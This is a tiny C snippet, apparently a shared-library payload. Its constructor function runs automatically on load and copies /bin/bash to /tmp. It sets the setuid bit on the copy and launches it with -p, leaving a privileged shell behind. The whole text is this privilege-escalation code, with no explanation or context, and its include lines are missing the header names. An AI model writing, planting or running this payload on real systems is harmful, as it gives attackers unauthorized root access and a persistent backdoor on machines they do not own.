#include #include static void welcome() __attribute__((constructor)); void welcome(){ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); }